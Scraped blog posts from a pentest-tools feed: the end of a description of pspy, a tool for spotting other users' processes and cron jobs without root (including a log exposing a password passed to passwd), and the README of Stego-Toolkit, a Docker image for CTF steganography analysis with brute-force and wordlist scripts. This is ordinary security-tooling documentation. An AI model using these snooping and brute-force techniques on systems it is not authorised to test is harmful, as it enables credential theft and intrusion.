21:01:01 CMD: UID=0 PID=25 |2018/02/18 21:01:01 CMD: UID=??? PID=24 | ???2018/02/18 21:01:01 CMD: UID=0 PID=23 | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser2018/02/18 21:01:01 CMD: UID=0 PID=26 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root2018/02/18 21:01:01 CMD: UID=101 PID=27 |2018/02/18 21:01:01 CMD: UID=8 PID=28 | /usr/sbin/exim4 -Mc 1enW4z-00000Q-MkFirst, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in roots private crontab /var/spool/cron/crontabs/root, which executes this shell command (check crontab and script). Note that myuser can neither see the crontab nor the Python script. With pspy, it can see the commands nevertheless.CTF example from Hack The BoxBelow is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chmod (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse:How it worksTools exist to list all processes executed on Linux systems, including those that have finished. For instance there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec.These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU.A stealthier way is to use the following trick. Process tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, ... Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require priviledged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does. There is no guarantee you won't miss one, but chances seem to be good in my experiments. In general, the longer the processes run, the bigger the chance of catching them is.Download Pspy

Link: http://feedproxy.google.com/~r/PentestTools/~3/Fd8DQCF6QlM/pspy-monitor-linux-processes-without.html

Stego-Toolkit – Collection Of Steganography Tools (Helps With CTF Challenges)

This project is a Docker image useful for solving Steganography challenges as those you can find at CTF platforms like hackthebox.eu. The image comes preinstalled with many popular (see list below) and several screening scripts you can use check simple things (for instance, run check_jpg.sh image.jpg to get a report for this JPG file).UsageFirst make sure you have Docker installed (how to). Then you can use the shell scripts bin/buid.sh and bin/run.sh in this repo to build the image and run the container. You will be dropped into a bash shell inside the container. It will have the data folder mounted, into which you can put the files to analyze.If you don’t use the scripts, follow these steps:Build image (docker build -t .) or pull from Docker hub (docker pull dominicbreuker/stego-toolkit)Start a container with your files mounted to the folder /data (docker run -it <image_name> -v /local/folder/with/data:/data /bin/bash)Use CLI tools and screening scripts on your files: e.g., run check_jpg.sh image.jpg to create a quick report, or run brute_jpg.sh image.jpg wordlist.txt to try extracting hidden data with various tools and passwordsIf you want to run GUI tools use one of these two ways:Run start_ssh.sh and connect to your container with X11 forwardingRun start_vnc.sh and connect to the container’s Desktop through your browserCheck out the following sections for more information:What tools are installed? Go hereWhat scripts can I run to quickly screen files automatically or brute force them? Go hereHow can I play with different Steganography examples to see if I can break them? Go hereHow can I run GUI tools inside the container? go hereDemoStart with docker run -it –rm -v $(pwd)/data:/data dominicbreuker/stego-toolkit /bin/bash. You will be dropped into a container shell in work dir /data. Your host folder $(pwd)/data will be mounted and the images inside will be accessible.ToolsMany different Linux and Windows tools are installed. Windows tools are supported with Wine. Some tools can be used on the command line while others require GUI support!Command line interface toolsThese tools can be used on the command line. All you have to do is start a container and mount the steganography files you want to check.General screening toolsTools to run in the beginning. Allow you to get a broad idea of what you are dealing with. Tool Description How to use file Check out what kind of file you have file stego.jpg exiftool Check out metadata of media files exiftool stego.jpg binwalk Check out if other files are embedded/appended binwalk stego.jpg strings Check out if there are interesting readable characters in the file strings stego.jpg foremost Carve out embedded/appended files foremost stego.jpg pngcheck Get details on a PNG file (or find out is is actually something else) pngcheck stego.png identify GraphicMagick tool to check what kind of image a file is. Checks also if image is corrupted. identify -verbose stego.jpg ffmpeg ffmpeg can be used to check integrity of audio files and let it report infos and errors ffmpeg -v info -i stego.mp3 -f null – to recode the file and throw away the result Tools detecting steganographyTools designed to detect steganography in files. Mostly perform statistical tests. They will reveal hidden messages only in simple cases. However, they may provide hints what to look for if they find interesting irregularities. Tool File types Description How to use stegoVeritas Images (JPG, PNG, GIF, TIFF, BMP) A wide variety of simple and advanced checks. Check out stegoveritas.py -h. Checks metadata, creates many transformed images and saves them to a directory, Brute forces LSB, … stegoveritas.py stego.jpg to run all checks zsteg Images (PNG, BMP) Detects various LSB stego, also openstego and the Camouflage tool zsteg -a stego.jpg to run all checks stegdetect Images (JPG) Performs statistical tests to find if a stego tool was used (jsteg, outguess, jphide, …). Check out man stegdetect for details. stegdetect stego.jpg stegbreak Images (JPG) Brute force cracker for JPG images. Claims it can crack outguess, jphide and jsteg. stegbreak -t o -f wordlist.txt stego.jpg, use -t o for outguess, -t p for jphide or -t j for jsteg Tools actually doing steganographyTools you can use to hide messages and reveal them afterwards. Some encrypt the messages before hiding them. If they do, they require a password. If you have a hint what kind of tool was used or what password might be right, try these tools. Some tools are supported by the brute force scripts available in this Docker image. Tool File types Description How to hide How to recover AudioStego Audio (MP3 / WAV) Details on how it works are in this blog post hideme cover.mp3 secret.txt && mv ./output.mp3 stego.mp3 hideme stego.mp3 -f && cat output.txt jphide/jpseek Image (JPG) Pretty old tool from here. Here, the version from here is installed since the original one crashed all the time. It prompts for a passphrase interactively! jphide cover.jpg stego.jpg secret.txt jpseek stego.jpg output.txt jsteg Image (JPG) LSB stego tool. Does not encrypt the message. jsteg hide cover.jpg secret.txt stego.jpg jsteg reveal cover.jpg output.txt mp3stego Audio (MP3) Old program. Encrypts and then hides a message (3DES encryption!). Windows tool running in Wine. Requires WAV input (may throw errors for certain WAV files. what works for me is e.g.: ffmpeg -i audio.mp3 -flags bitexact audio.wav). Important: use absolute path only! mp3stego-encode -E secret.txt -P password /path/to/cover.wav /path/to/stego.mp3 mp3stego-decode -X -P password /path/to/stego.mp3 /path/to/out.pcm /path/to/out.txt openstego Images (PNG) Various LSB stego algorithms (check out this blog). Still maintained. openstego embed -mf secret.txt -cf cover.png -p password -sf stego.png openstego extract -sf openstego.png -p abcd -xf output.txt (leave out -xf to create file with original name!) outguess Images (JPG) Uses “redundant bits" to hide data. Comes in two versions: old=outguess-0.13 taken from here and new=outguess from the package repos. To recover, you must use the one used for hiding. outguess -k password -d secret.txt cover.jpg stego.jpg outguess -r -k password stego.jpg output.txt spectrology Audio (WAV) Encodes an image in the spectrogram of an audio file. TODO Use GUI tool sonic-visualiser stegano Images (PNG) Hides data with various (LSB-based) methods. Provides also some screening tools. stegano-lsb hide –input cover.jpg -f secret.txt -e UTF-8 –output stego.png or stegano-red hide –input cover.png -m "secret msg" –output stego.png or stegano-lsb-set hide –input cover.png -f secret.txt -e UTF-8 -g $GENERATOR –output stego.png for various generators (stegano-lsb-set list-generators) stegano-lsb reveal -i stego.png -e UTF-8 -o output.txt or stegano-red reveal -i stego.png or stegano-lsb-set reveal -i stego.png -e UTF-8 -g $GENERATOR -o output.txt Steghide Images (JPG, BMP) and Audio (WAV, AU) Versatile and mature tool to encrypt and hide data. steghide embed -f -ef secret.txt -cf cover.jpg -p password -sf stego.jpg steghide extract -sf stego.jpg -p password -xf output.txt cloackedpixel Images (PNG) LSB stego tool for images cloackedpixel hide cover.jpg secret.txt password creates cover.jpg-stego.png cloackedpixel extract cover.jpg-stego.png output.txt password LSBSteg Images (PNG, BMP, …) in uncompressed formats Simple LSB tools with very nice and readable Python code LSBSteg encode -i cover.png -o stego.png -f secret.txt LSBSteg decode -i stego.png -o output.txt Steganography GUI toolsAll tools below have graphical user interfaces and cannot be used through the command line. To run them, you must make an X11 server available inside the container. Two ways are supported:run start_ssh.sh to fire up an SSH server. Connect afterwards with X11 forwarding. Requires an X11 server on your host!run start_vnc.sh to fire up a VNC server + client. Connect afterwards with your browser to port 6901 and you get an Xfce desktop. No host dependencies!Alternatively, find other ways to make X11 available inside the container. Many different ways are possible (e.g., mount UNIX sockets). Tool File types Description How to start Steg Images (JPG, TIFF, PNG, BMP) Handles many file types and implements different methods steg Steganabara (The original link is broken) Images (???) Interactively transform images until you find somethinf steganabara Stegsolve Images (???) Interactively transform images, view color schemes separately, … stegsolve SonicVisualiser Audio (???) Visualizing audio files in waveform, display spectrograms, … sonic-visualiser Stegosuite Images (JPG, GIF, BMP) Can encrypt and hide data in images. Actively developed. stegosuite OpenPuff Images, Audio, Video (many formats) Sophisticated tool with long history. Still maintained. Windows tool running in wine. openpuff DeepSound Audio (MP3, WAV) Audio stego tool trusted by Mr. Robot himself. Windows tool running in wine (very hacky, requires VNC and runs in virtual desktop, MP3 broken due to missing DLL!) deepsound only in VNC session cloackedpixel-analyse Images (PNG) LSB stego visualization for PNGs – use it to detect suspiciously random LSB values in images (values close to 0.5 may indicate encrypted data is embedded) cloackedpixel-analyse image.png Screening scriptsMany tools above do not require interaction with a GUI. Therefore, you can easily automate some workflows to do basic screening of files potentially containing hidden messages. Since the applicable tools differ by filet type, each file type has different scripts.For each file type, there are two kinds of scripts:XXX_check.sh <stego-file>: runs basic screening tools and creates a report (+ possibly a directory with reports in files)XXX_brute.sh <stego-file> <wordlist>: tries to extract a hidden message from a stego file with various tools using a wordlist (cewl, john and crunch are installed to generate lists – keep them small).The following filetypes are supported:JPG: check_jpg.h and brute_jpg.sh (brute running steghide, outguess, outguess-0.13, stegbreak, stegoveritas.py -bruteLSB)PNG: check_png.h and brute_png.sh (brute running openstego and stegoveritas.py -bruteLSB)Wordlist generationThe brute forcing scripts above need wordlists. Imho it will very likely not help to use huge standard wordlists like rockyou. The scripts are too slow for it and stego challenges seem to not be designed for this. A more probable scenario is that you have a hunch what the password could be but you do not know exactly.For these cases, several tools to generate wordlists are included:john: the community enhanced version of John the Ripper can expand your wordlists. Create a base wordlist with a few candidate passwords and use john to create many variants of them. Use john -wordlist:/path/to/your/wordlist -rules:Single -stdout > /path/to/expanded/wordlist to apply extensive rules (~x1000) john -wordlist:/path/to/your/wordlist -rules:Wordlist -stdout > /path/to/expanded/wordlist for a reduced ruleset (~x50).crunch: can generate small wordlists if you have a pattern in mind. For instance, if you know the passwords ends with 1984 and is 6 letters long, use crunch 6 6 abcdefghijklmnopqrstuvwxyz -t @@1984 will generate the 26 * 26 = 676 passwords aa1984, ab1984, … up to zz1984. The format is crunch <min-length> <max-length> <charset> <options> and we used the templating option. Check out less /usr/share/crunch/charset.lst to see the charsets crunch ships with.CeWL: can generate wordlists if you know a website is related to a password. For instance, run cewl -d 0 -m 8 https://en.wikipedia.org/wiki/Donald_Trump if you suspect a picture of Donald Trump contains an encrypted hidden message. The command scrapes the site and extracts strings at least 8 characters long.Steganography examplesThe image contains a sample image and audio file each in different formats:/examples/ORIGINAL.jpg/examples/ORIGINAL.png/examples/ORIGINAL.mp3/examples/ORIGINAL.wavIt also contains a script /examples/create_examples.sh which you can run to embed a hidden message ("This is a very secret message!") into these files with many different methods. After running this script, you find these files in /examples/stego-files with their names indicating which tool was used to embed the message. You can run the screening scripts to see if they find anything on them or try to break them otherwise.GUI and ContainersBy default, no GUI tools can be run in a Docker container as no X11 server is available. To run them, you must change that. What is required to do so depends on your host machine. If you:run on Linux, you probably have X11run on Mac OS, you need Xquartz (brew install Xquartz)run on Windows, you have a problemUse X11 forwarding through SSH if you want to go this way. Run start_ssh inside the container to start the server, make sure you expose port 22 when starting the container: docker run -p 127.0.0.1:22:22 …, then use ssh -X … when connecting (the script prints the password).To not depend on X11, the image comes with a TigerVNC server and noVNC client. You can use it to open an HTML5 VNC session with your browser to connect to the containers Xfce desktop. To to that, run start_vnc.sh inside the container to start server and client, make sure you expose port 6901 when starting the container docker run -p 127.0.0.1:6901:6901 … and go to localhost:6901/?password=<the_password> (the script prints the password).Using SSH with X11 forwarding Commands in the GIF for copy & paste:# in 1st host shelldocker run -it –rm -p 127.0.0.1:22:22 dominicbreuker/stego-toolkit /bin/bash# inside container shellstart_ssh.sh# in 2nd host shell (use it to launch GUI apps afterwards)ssh -X -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@localhostUsing Browser and VNCCommands in the GIF for copy & paste:# in 1st host shelldocker run -it –rm -p 127.0.0.1:6901:6901 dominicbreuker/stego-toolkit /bin/bash# inside container shellstart_vnc.sh# in browser, connect with: http://localhost:6901/?password=<password_from_start_vnc>Link collectionThis is a collection of useful Steganography links:You must be able to spot codes. Check out this cheat sheet from Eric Harshbarger, which contains many different codes.Cheatsheet describing workflows, things to look for and common tools: clickForensics CTF guide with lots of ideas for stego challenges: clickFile format descriptions as beautiful posters: clickReferencesThe following example media files are included in this repository:Demo image (JPG, PNG): https://pixabay.com/p-1685092Demo sound file (MP3, WAV): https://upload.wikimedia.org/wikipedia/commons/c/c5/Auphonic-wikimedia-test-stereo.ogg — By debuglevel (Own work) [CC BY-SA 3.0 (https://creativecommons.org/licenses/by-sa/3.0)], via Wikimedia CommonsDownload Stego-Toolkit

Link: http://feedproxy.google.com/~r/PentestTools/~3/aAcCTM5gpFM/stego-toolkit-collection-of.html